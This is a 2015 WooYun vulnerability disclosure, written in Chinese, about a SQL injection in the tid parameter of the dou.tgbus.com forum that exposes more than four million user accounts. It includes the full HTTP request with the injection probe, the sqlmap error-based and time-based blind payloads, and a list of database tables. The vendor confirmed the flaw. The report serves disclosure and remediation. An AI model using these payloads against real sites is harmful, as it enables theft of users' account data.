当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103982

漏洞标题:电玩巴士某漏洞可导致四百多万用户账户密码信息泄露

相关厂商:电玩巴士

漏洞作者: netwind

提交时间:2015-03-26 19:31

修复时间:2015-05-11 11:08

公开时间:2015-05-11 11:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向核心白帽子及相关领域专家公开
2015-04-16: 细节向普通白帽子公开
2015-04-26: 细节向实习白帽子公开
2015-05-11: 细节向公众公开

简要描述:

电玩巴士某漏洞可导致四百多万用户账户密码信息泄露

详细说明:

POST /forum.php?action=reply&extra=page%3D1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://dou.tgbus.com
Cookie: 7yB8_2132_saltkey=DctRkTCr; 7yB8_2132_lastvisit=1427287580; 7yB8_2132_sid=F55R5J; 7yB8_2132_lastact=1427296340%09member.php%09logging; 7yB8_2132_forum_lastvisit=D_105_1427291190D_435_1427291194D_225_1427291204D_495_1427291212D_212_1427291221D_50_1427291269D_40_1427291300D_242_1427296340; 7yB8_2132_visitedfid=242D39D484D40D50D467D486D441D222D475; 7yB8_2132__refer=%252Fhome.php%253Fac%253Dfriend%2526handlekey%253Daddfriendhk_15119828%2526mod%253Dspacecp%2526op%253Dadd%2526uid%253D15119828; 7yB8_2132_home_diymode=1; 7yB8_2132_sendmail=1; 7yB8_2132_fid39=1427291183; 7yB8_2132_fid242=1427291238; 7yB8_2132_fid40=1427291264
Host: dou.tgbus.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
formhash=1094aa0f&subject=


参数tid存在注入漏洞

漏洞证明:

sqlma获得数据库信息如下:

---
Place: URI
Parameter: #1*
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://dou.tgbus.com:80/forum.php?action=reply&extra=page=1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()=sysdate(),sleep(0),0)/' AND (SELECT 3666 FROM(SELECT COUNT(*),CONCAT(0x7170717171,(SELECT (CASE WHEN (3666=3666) THEN 1 ELSE 0 END)),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GYHb'='GYHb'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: http://dou.tgbus.com:80/forum.php?action=reply&extra=page=1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()=sysdate(),sleep(0),0)/-9717' OR 2709=SLEEP(5) AND 'MOVQ'='MOVQ'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
web application technology: PHP 5.4.28
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] tgbus_dou_x2
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---


有241个表 部分内容如下:

---
Place: URI
Parameter: #1*
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://dou.tgbus.com:80/forum.php?action=reply&extra=page=1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()=sysdate(),sleep(0),0)/' AND (SELECT 3666 FROM(SELECT COUNT(*),CONCAT(0x7170717171,(SELECT (CASE WHEN (3666=3666) THEN 1 ELSE 0 END)),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GYHb'='GYHb'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: http://dou.tgbus.com:80/forum.php?action=reply&extra=page=1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()=sysdate(),sleep(0),0)/-9717' OR 2709=SLEEP(5) AND 'MOVQ'='MOVQ'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
web application technology: PHP 5.4.28
back-end DBMS: MySQL 5.0
Database: tgbus_dou_x2
[241 tables]
+------------------------------------+
| pre_baidusubmit_setting |
| pre_baidusubmit_sitemap |
| pre_baidusubmit_urlstat |
| pre_common_addon |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |


pre_common_member 表存在大量用户账户信息

QQ图片20150326191139.png


约400多万用户账户密码信息
这里仅做证明只列出1条信息 然后终止了SQLMAP程序
点到即止 并未深入!

修复方案:

1、鉴于可导致泄露信息量过大,恳请给20RANK 可好?
挖洞不易!愿意继续免费挖洞 协助网站安全
2、对参数tid严格过滤!

版权声明:转载请注明来源 netwind@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-27 11:06

厂商回复:

感谢白帽"netwind"的热心指正.已确认该漏洞是论坛程序的一些不严谨过滤规则导致.已递交修复.十分感谢.

最新状态:

暂无


漏洞评价:

评论